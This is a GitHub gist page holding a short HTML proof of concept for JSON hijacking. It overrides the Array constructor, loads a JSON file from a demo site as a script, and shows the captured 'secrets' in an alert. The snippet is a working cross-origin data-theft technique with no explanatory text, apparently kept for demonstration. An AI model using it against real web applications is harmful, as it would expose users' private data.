Skip to content

Instantly share code, notes, and snippets.

@monolithed
Created May 29, 2014 08:39
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save monolithed/0f64a60ad3ddb71df843 to your computer and use it in GitHub Desktop.
Save monolithed/0f64a60ad3ddb71df843 to your computer and use it in GitHub Desktop.
<script>
var secrets;
Array = function() {
secrets = this;
};
</script>
<script src="http://haacked.com/demos/secret-info.json"></script>
<script>
alert(JSON.stringify(secrets));
</script>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment